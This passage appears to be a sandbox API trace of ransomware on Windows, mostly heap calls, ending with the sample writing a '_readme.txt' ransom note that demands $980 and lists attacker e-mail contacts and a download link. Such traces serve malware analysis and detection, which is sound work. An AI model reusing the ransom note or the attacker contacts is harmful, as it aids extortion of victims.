dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.523] PathFindFileNameW (pszPath="C:\\Boot\\es-ES\\") returned="es-ES\\" [0228.523] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd450 | out: hHeap=0x620000) returned 1 [0228.523] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.523] PathFindFileNameW (pszPath="") returned="" [0228.523] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.524] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.524] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.524] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.524] PathAppendW (in: pszPath="C:\\Boot\\es-ES\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0228.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.525] PathFileExistsW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 0 [0228.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x3b7b818 [0228.526] lstrcpyW (in: lpString1=0x3b7b818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.526] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3467538 [0228.526] CreateFileW (lpFileName="C:\\Boot\\es-ES\\_readme.txt" (normalized: "c:\\boot\\es-es\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3467538 | out: hHeap=0x620000) returned 1 [0228.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b818 | out: hHeap=0x620000) returned 1 [0228.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79140 [0228.527] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.527] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | 